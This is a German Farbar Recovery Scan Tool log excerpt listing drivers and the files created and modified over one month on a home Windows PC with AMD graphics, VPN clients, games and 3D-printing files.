S3 Hamachi; C:\WINDOWS\system32\DRIVERS\Hamdrv.sys [45680 2022-05-18] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.)
S3 libusbK; C:\WINDOWS\System32\drivers\libusbK.sys [47928 2014-04-27] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net)
R3 logi_joy_bus_enum; C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys [37200 2022-01-27] (Logitech Inc -> Logitech)
S3 logi_joy_vir_hid; C:\WINDOWS\system32\drivers\logi_joy_vir_hid.sys [25928 2022-01-27] (Logitech Inc -> Logitech)
R3 logi_joy_xlcore; C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys [66896 2022-01-27] (Logitech Inc -> Logitech)
R3 MpKsl1c553e39; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{D479777D-A18A-4C5E-B392-5D90B604D03D}\MpKslDrv.sys [263560 2023-10-24] (Microsoft Windows -> Microsoft Corporation)
R3 Nahimic_Mirroring; C:\WINDOWS\System32\drivers\Nahimic_Mirroring.sys [94784 2022-06-03] (A-Volute SAS -> Windows (R) Win 7 DDK provider)
U5 PROCMON24; C:\Windows\System32\Drivers\PROCMON24.sys [80296 2023-07-16] (Microsoft Windows Hardware Compatibility Publisher -> Sysinternals - www.sysinternals.com)
R3 ProtonVPNCallout; C:\Program Files\Proton\VPN\v3.2.4\Resources\ProtonVPN.CalloutDriver.sys [34176 2023-08-02] (Microsoft Windows Hardware Compatibility Publisher -> Proton Technologies AG)
S3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [36824 2020-07-13] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
R3 tap0901; C:\WINDOWS\System32\drivers\tap0901.sys [27136 2018-08-29] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 tapprotonvpn; C:\WINDOWS\System32\drivers\tapprotonvpn.sys [49024 2022-04-01] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project)
S4 UCPD; C:\WINDOWS\System32\drivers\UCPD.sys [29184 2023-09-15] (Microsoft Windows -> Microsoft Corporation)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [55856 2023-10-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
U5 WdDevFlt; C:\Windows\System32\Drivers\WdDevFlt.sys [169232 2022-05-07] (Microsoft Windows -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [572712 2023-10-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [105872 2023-10-04] (Microsoft Windows -> Microsoft Corporation)
S3 wintun; C:\WINDOWS\System32\drivers\wintun.sys [29592 2023-08-24] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)
R3 WireGuard; C:\WINDOWS\System32\drivers\wireguard.sys [489368 2022-06-16] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)
S3 xhunter1; C:\Windows\xhunter1.sys [1445920 2022-11-27] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S3 HWiNFO_180; \??\C:\Users\*****\AppData\Local\Temp\HWiNFO64A_180.SYS [X] <==== ACHTUNG
S1 npcap; \SystemRoot\system32\DRIVERS\npcap.sys [X]
U4 npcap_wifi; kein ImagePath
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2023-10-24 11:37 - 2023-10-24 11:37 - 000758838 _____ C:\WINDOWS\system32\perfh007.dat
2023-10-24 11:37 - 2023-10-24 11:37 - 000157058 _____ C:\WINDOWS\system32\perfc007.dat
2023-10-23 22:42 - 2023-10-23 22:42 - 000000000 ____D C:\Users\*****\AppData\Local\Hogwarts Legacy
2023-10-23 22:42 - 2023-10-23 22:42 - 000000000 ____D C:\Intel
2023-10-20 18:26 - 2023-10-24 11:31 - 000003118 _____ C:\WINDOWS\system32\Tasks\AMDInstallLauncher
2023-10-20 18:25 - 2023-10-24 11:31 - 000003110 _____ C:\WINDOWS\system32\Tasks\AMDLinkUpdate
2023-10-20 18:25 - 2023-10-20 18:25 - 000003484 _____ C:\WINDOWS\system32\Tasks\ModifyLinkUpdate
2023-10-20 18:25 - 2023-10-20 18:25 - 000002622 _____ C:\WINDOWS\system32\Tasks\AMDRyzenMasterSDKTask
2023-10-20 18:25 - 2023-10-20 18:25 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2023-10-20 18:25 - 2023-10-20 18:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Software꞉ Adrenalin Edition
2023-10-20 18:25 - 2023-10-20 18:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Bug Report Tool
2023-10-20 18:22 - 2023-10-19 09:44 - 002091056 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe
2023-10-20 18:22 - 2023-10-19 09:44 - 002091056 _____ C:\WINDOWS\system32\vulkaninfo.exe
2023-10-20 18:22 - 2023-10-19 09:44 - 001649200 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2023-10-20 18:22 - 2023-10-19 09:44 - 001649200 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2023-10-20 18:22 - 2023-10-19 09:44 - 001456192 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll
2023-10-20 18:22 - 2023-10-19 09:44 - 001456192 _____ C:\WINDOWS\system32\vulkan-1.dll
2023-10-20 18:22 - 2023-10-19 09:44 - 001297536 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll
2023-10-20 18:22 - 2023-10-19 09:44 - 001297536 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2023-10-20 18:22 - 2023-10-19 09:44 - 000176688 _____ C:\WINDOWS\system32\mantleaxl64.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000721456 _____ C:\WINDOWS\system32\hiprt0200064.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000598056 _____ C:\WINDOWS\system32\GameManager64.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000539184 _____ C:\WINDOWS\system32\libsmi_guest.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000514608 _____ C:\WINDOWS\system32\libsmi_host.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000494016 _____ C:\WINDOWS\system32\EEURestart.exe
2023-10-20 18:22 - 2023-10-19 09:43 - 000256960 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000219072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000197568 _____ C:\WINDOWS\system32\mantle64.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000186304 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000174528 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000156080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000155696 _____ C:\WINDOWS\SysWOW64\mantle32.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000139312 _____ C:\WINDOWS\SysWOW64\mantleaxl32.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000138688 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000127440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2023-10-20 18:22 - 2023-10-19 09:43 - 000121688 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atidxx32.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 011747120 _____ C:\WINDOWS\system32\amdsmi.exe
2023-10-20 18:22 - 2023-10-19 09:42 - 002235328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdsasrv64.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 001701040 _____ (AMD) C:\WINDOWS\system32\amf-mft-mjpeg-decoder64.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 001607616 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 001607616 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 001328576 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdsacli64.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 001049536 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdsacli32.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 000965568 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2023-10-20 18:22 - 2023-10-19 09:42 - 000933824 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 000761280 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 000527296 _____ C:\WINDOWS\system32\atieah64.exe
2023-10-20 18:22 - 2023-10-19 09:42 - 000463296 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 000396224 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2023-10-20 18:22 - 2023-10-19 09:42 - 000200944 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 000164864 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 000128960 _____ C:\WINDOWS\system32\amdxc64.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 000104896 _____ C:\WINDOWS\SysWOW64\amdxc32.dll
2023-10-20 18:22 - 2023-10-19 09:42 - 000064960 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2023-10-20 18:22 - 2023-10-19 09:41 - 004375088 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdadlx64.dll
2023-10-20 18:22 - 2023-10-19 09:41 - 004180016 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdadlx32.dll
2023-10-20 18:22 - 2023-10-19 09:41 - 001378456 _____ (AMD) C:\WINDOWS\SysWOW64\amf-mft-mjpeg-decoder32.dll
2023-10-20 18:22 - 2023-10-19 09:41 - 000791600 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2023-10-20 18:22 - 2023-10-19 09:41 - 000668720 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2023-10-20 18:22 - 2023-10-19 09:41 - 000560176 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2023-10-20 18:22 - 2023-10-19 09:41 - 000532928 _____ C:\WINDOWS\system32\dgtrayicon.exe
2023-10-20 18:22 - 2023-10-19 09:41 - 000461248 _____ C:\WINDOWS\system32\amdlogum.exe
2023-10-20 18:22 - 2023-10-19 09:41 - 000423984 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2023-10-20 18:22 - 2023-10-19 09:41 - 000177760 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdihk32.dll
2023-10-20 18:22 - 2023-10-19 09:41 - 000041520 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2023-10-20 18:22 - 2023-10-19 09:41 - 000038448 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 105391040 _____ C:\WINDOWS\system32\amd_comgr.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 088605632 _____ C:\WINDOWS\SysWOW64\amd_comgr32.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 019424192 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdhip64.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 000557552 _____ C:\WINDOWS\system32\amdmiracast.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 000515008 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 000380864 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 000328056 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdfendr.stz
2023-10-20 18:22 - 2023-10-19 09:40 - 000166848 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl6.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 000156080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 000135616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 000127328 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2023-10-20 18:22 - 2023-10-19 09:40 - 000093120 _____ C:\WINDOWS\system32\clinfo.exe
2023-10-20 18:22 - 2023-10-19 09:40 - 000046456 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdfendrmgr.stz
2023-10-20 18:22 - 2023-10-19 09:39 - 000166440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2023-10-20 18:22 - 2023-10-19 09:39 - 000141384 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2023-10-20 18:22 - 2023-10-19 08:32 - 110152720 _____ C:\WINDOWS\system32\amdxc64.so
2023-10-18 22:51 - 2023-10-18 22:51 - 000001050 _____ C:\Users\Public\Desktop\Proton VPN.lnk
2023-10-16 22:19 - 2023-10-16 22:19 - 000000000 ____D C:\WINDOWS\system32\Microsoft-Edge-WebView
2023-10-16 21:28 - 2023-10-16 21:28 - 000000916 _____ C:\Users\Public\Desktop\VLC media player.lnk
2023-10-16 21:22 - 2023-10-16 21:24 - 000000000 ___HD C:\$WinREAgent
2023-10-16 19:55 - 2023-10-16 19:55 - 000873400 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Device.dll
2023-10-16 19:55 - 2023-10-16 19:55 - 000061368 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Platform.dll
2023-10-16 13:44 - 2023-10-16 13:44 - 000058952 _____ (Advanced Micro Devices) C:\WINDOWS\system32\AMDRyzenMasterDriver.sys
2023-10-13 17:06 - 2023-10-13 17:06 - 000060462 _____ C:\WINDOWS\SysWOW64\ctac.json
2023-10-13 17:05 - 2023-10-13 17:05 - 000060462 _____ C:\WINDOWS\system32\ctac.json
2023-10-13 17:05 - 2023-10-13 17:05 - 000016239 _____ C:\WINDOWS\system32\IntegratedServicesRegionPolicySet.json
2023-10-12 21:49 - 2023-10-19 09:43 - 000452656 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2023-10-12 01:44 - 2023-10-13 16:58 - 000000000 ____D C:\Program Files\Mozilla Firefox
2023-10-11 23:32 - 2023-10-11 23:32 - 000000881 _____ C:\Users\*****\AppData\Local\recently-used.xbel
2023-10-07 19:51 - 2023-10-07 20:35 - 000000000 ____D C:\Users\*****\Desktop\eBay
2023-10-03 18:07 - 2023-10-03 18:07 - 000695750 _____ C:\Users\*****\Downloads\Pin_valve_Jura_12m_0.08mm_210C_PLA_ENDER3BLTOUCH.gcode
2023-09-30 19:05 - 2023-10-04 20:56 - 000015150 _____ C:\Users\*****\Documents\smartIH.pdsprj.DESKTOP-06IS096.*****.workspace
2023-09-30 18:51 - 2023-10-04 20:56 - 000022202 _____ C:\Users\*****\Documents\smartIH.pdsprj
2023-09-30 18:51 - 2023-10-04 20:56 - 000000000 ____D C:\Users\*****\Documents\Project Backups
2023-09-30 18:47 - 2023-09-30 18:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Proteus 8 Professional
2023-09-30 18:47 - 2023-09-30 18:47 - 000000000 ____D C:\Program Files (x86)\Labcenter Electronics
2023-09-30 18:46 - 2023-09-30 18:46 - 000000000 ____D C:\Users\*****\AppData\Roaming\Labcenter Electronics
2023-09-30 18:12 - 2023-09-30 18:12 - 000000000 ____D C:\WINDOWS\system32\6764.tmp
2023-09-30 17:54 - 2023-09-30 17:54 - 000000000 ____D C:\WINDOWS\system32\80B6.tmp
2023-09-30 17:50 - 2023-09-30 17:50 - 000000000 ____D C:\Users\*****\AppData\Local\Labcenter Electronics
2023-09-30 17:49 - 2023-09-30 17:49 - 000000000 ____D C:\ProgramData\Labcenter Electronics
2023-09-30 17:44 - 2023-09-30 18:11 - 000001409 _____ C:\Users\Public\Licence2.lxk
2023-09-30 17:44 - 2023-09-30 17:44 - 000000000 ____D C:\WINDOWS\system32\E7CD.tmp
2023-09-27 22:04 - 2023-09-27 22:03 - 000498900 _____ C:\Users\*****\Downloads\headphone-holder-Body_1_34m_0.28mm_210C_PLA_ENDER3BLTOUCH.gcode
2023-09-27 13:23 - 2023-09-27 13:23 - 000401608 _____ C:\Users\*****\Downloads\headphone-holder-Body_1_29m_0.28mm_210C_PLA_ENDER3BLTOUCH.gcode
2023-09-26 19:11 - 2023-09-26 19:16 - 000038825 _____ C:\Users\kids.DESKTOP-06IS096\Documents\lebenslauf Domenic.pdf
2023-09-24 20:03 - 2023-09-24 20:02 - 000947944 _____ C:\Users\*****\Downloads\heater-endgueltig-rund-deckel-Body_1_1h47m_0.28mm_210C_PLA_ENDER3BLTOUCH.gcode
==================== Ein Monat (geänderte) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2023-10-24 13:12 - 2021-12-23 01:51 - 000000000 ____D C:\FRST
2023-10-24 11:46 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\SystemTemp
2023-10-24 11:42 - 2021-10-16 21:04 - 000000000 ____D C:\Users\*****\AppData\Local\D3DSCache
2023-10-24 11:39 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\AppReadiness
2023-10-24 11:39 - 2022-05-07 07:24 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2023-10-24 11:37 - 2023-02-11 16:29 - 001754660 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2023-10-24 11:37 - 2022-05-07 07:22 - 000000000 ____D C:\WINDOWS\INF
2023-10-24 11:31 - 2023-07-01 23:32 - 000000000 ____D C:\WINDOWS\system32\Tasks\PowerToys
2023-10-24 11:30 - 2023-02-11 06:56 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2023-10-24 11:30 - 2023-02-11 06:54 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2023-10-24 11:30 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\ServiceState
2023-10-24 11:30 - 2021-10-16 20:56 - 000012288 ___SH C:\DumpStack.log.tmp
2023-10-24 04:09 - 2022-05-07 07:17 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2023-10-24 04:08 - 2021-10-17 00:53 - 000000000 ____D C:\Program Files (x86)\Steam
2023-10-24 01:51 - 2022-05-07 07:24 - 000000000 ___HD C:\Program Files\WindowsApps
2023-10-23 23:24 - 2021-10-17 00:36 - 000000000 ____D C:\Users\*****\AppData\Roaming\Notepad++
2023-10-23 22:23 - 2023-02-25 21:24 - 000000000 ____D C:\Users\*****\Documents\savegame
2023-10-22 21:06 - 2021-10-16 20:56 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2023-10-21 03:31 - 2021-10-17 00:37 - 000000000 ____D C:\Users\*****\AppData\Roaming\vlc
2023-10-20 23:47 - 2021-10-17 02:03 - 000000000 ____D C:\AMD
2023-10-20 18:25 - 2023-09-23 00:47 - 000003152 _____ C:\WINDOWS\system32\Tasks\StartCN
2023-10-20 18:25 - 2023-09-23 00:47 - 000003072 _____ C:\WINDOWS\system32\Tasks\StartDVR
2023-10-20 18:25 - 2023-07-17 11:04 - 000000000 ____D C:\Users\*****\AppData\LocalLow\AMD
2023-10-20 18:25 - 2021-10-16 21:04 - 000000000 ____D C:\Users\*****\AppData\Local\Packages
2023-10-20 18:25 - 2021-10-16 21:04 - 000000000 ____D C:\Users\*****\AppData\Local\AMD
2023-10-20 18:25 - 2021-10-16 21:02 - 000000000 ____D C:\Program Files\AMD
2023-10-20 18:24 - 2021-10-16 21:04 - 000000000 ____D C:\ProgramData\Packages
2023-10-20 18:21 - 2021-10-17 00:27 - 000000000 ____D C:\Users\*****\AppData\Local\AMD_Common
2023-10-19 22:47 - 2021-10-17 00:27 - 000000000 ____D C:\Users\*****\AppData\Local\CrashDumps
2023-10-19 09:43 - 2023-09-23 00:24 - 000147768 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atidxx64.dll
2023-10-19 09:42 - 2022-12-02 01:42 - 002089920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2023-10-19 09:41 - 2022-12-02 01:42 - 000222592 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdihk64.dll
2023-10-18 23:49 - 2021-10-17 00:35 - 000000000 ____D C:\Users\*****\AppData\Roaming\Microsoft\MMC
2023-10-18 22:51 - 2023-08-19 00:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Proton
2023-10-17 23:31 - 2023-02-25 22:43 - 000000000 ____D C:\Games
2023-10-17 22:10 - 2021-10-17 00:27 - 000000000 ____D C:\Users\*****\AppData\Local\ElevatedDiagnostics
2023-10-17 18:47 - 2021-10-17 00:33 - 000000000 ____D C:\WINDOWS\system32\MRT
2023-10-17 02:04 - 2021-10-17 02:14 - 002969136 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\AMDBugReportTool.exe
2023-10-16 22:20 - 2023-02-11 06:54 - 000342368 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2023-10-16 22:19 - 2022-05-07 12:39 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\UUS
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\SystemResources
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\system32\setup
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\system32\oobe
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\system32\migwiz
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\system32\Dism
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\system32\appraiser
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\ShellExperiences
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\ShellComponents
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\Provisioning
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2023-10-16 22:19 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\bcastdvr
2023-10-16 21:28 - 2022-05-07 07:17 - 000000000 ____D C:\WINDOWS\CbsTemp
2023-10-16 16:15 - 2021-10-17 00:36 - 000000000 ____D C:\Users\*****\AppData\Roaming\PrusaSlicer
2023-10-16 16:15 - 2021-10-17 00:27 - 000001084 _____ C:\Users\*****\printrunconf.ini
2023-10-16 13:27 - 2021-10-17 00:34 - 000000000 ____D C:\Users\*****\AppData\Local\UnrealEngine
2023-10-16 13:26 - 2022-08-28 13:16 - 000000000 ____D C:\Program Files (x86)\EasyAntiCheat_EOS
2023-10-16 13:26 - 2021-10-17 00:35 - 000000000 ____D C:\Users\*****\AppData\Roaming\EasyAntiCheat
2023-10-16 13:21 - 2022-05-07 07:24 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2023-10-16 11:42 - 2023-05-24 08:29 - 037017246 _____ C:\Users\*****\Desktop\pronterface.exe
2023-10-15 18:06 - 2022-05-07 07:24 - 000000000 ____D C:\ProgramData\USOPrivate
2023-10-13 17:08 - 2021-10-17 00:33 - 181553176 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2023-10-13 17:06 - 2023-02-11 06:56 - 003210752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2023-10-13 16:59 - 2021-10-19 15:54 - 000000000 ____D C:\Users\kids.DESKTOP-06IS096\AppData\Local\Packages
2023-10-13 16:58 - 2021-10-16 21:06 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2023-10-13 00:00 - 2023-06-22 00:05 - 000000000 ____D C:\Users\*****\AppData\Local\PokerStars.DE
2023-10-12 23:32 - 2023-06-22 00:05 - 000000000 ____D C:\Program Files (x86)\PokerStars.DE
2023-10-12 21:44 - 2021-10-16 21:06 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2023-10-12 02:27 - 2021-10-17 00:27 - 000000000 ____D C:\Users\*****\AppData\Local\Battle.net
2023-10-12 02:05 - 2022-02-11 22:29 - 000000000 ____D C:\Program Files (x86)\Overwatch
2023-10-12 00:56 - 2021-10-17 00:27 - 000000000 ____D C:\Users\*****\AppData\Local\babl-0.1
2023-10-11 23:32 - 2021-10-17 00:28 - 000000000 ____D C:\Users\*****\AppData\Local\gtk-2.0
2023-10-06 22:33 - 2023-09-09 23:43 - 000000000 ____D C:\Users\*****\AppData\Local\Starfield
2023-10-05 09:12 - 2021-10-19 15:54 - 000000000 ____D C:\Users\kids.DESKTOP-06IS096\AppData\Local\D3DSCache
2023-10-04 22:57 - 2021-10-16 20:56 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2023-10-01 14:19 - 2021-10-17 00:35 - 000000000 ____D C:\Users\*****\AppData\Roaming\discord
2023-10-01 14:06 - 2021-10-18 12:34 - 000000000 ____D C:\Users\*****\AppData\Local\Discord
2023-10-01 01:50 - 2022-06-17 19:22 - 000000000 ____D C:\Users\*****\AppData\Local\Vivox
2023-09-30 20:07 - 2022-02-11 22:28 - 000000000 ____D C:\Program Files (x86)\Battle.net
2023-09-30 17:41 - 2023-09-15 08:17 - 000255592 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy_3.dll
2023-09-30 17:41 - 2022-10-20 23:16 - 000095736 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgamehelper.exe
2023-09-30 17:41 - 2022-10-20 23:16 - 000075360 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgamecontrol.exe
2023-09-30 17:41 - 2021-11-20 01:07 - 000181864 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2023-09-30 17:41 - 2021-11-06 20:23 - 002709096 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2023-09-30 17:41 - 2021-11-06 20:23 - 000503808 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2023-09-30 17:41 - 2021-11-06 20:23 - 000210536 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2023-09-30 17:41 - 2021-11-06 20:23 - 000145000 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2023-09-29 14:29 - 2023-09-04 09:42 - 000000000 ____D C:\Users\kids.DESKTOP-06IS096\AppData\Local\LogMeIn Hamachi
2023-09-29 14:28 - 2022-02-04 18:02 - 000000000 ____D C:\Users\kids.DESKTOP-06IS096\AppData\Local\CrashDumps
2023-09-26 19:16 - 2023-02-20 23:32 - 000000000 ____D C:\Users\*****\Desktop\bitte aufräumen
2023-09-26 19:06 - 2022-05-05 16:15 - 000000000 ____D C:\Users\kids.DESKTOP-06IS096\AppData\Local\AMD_Common
2023-09-26 10:28 - 2021-10-19 15:54 - 000000000 ____D C:\Users\kids.DESKTOP-06IS096\AppData\Local\AMD
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
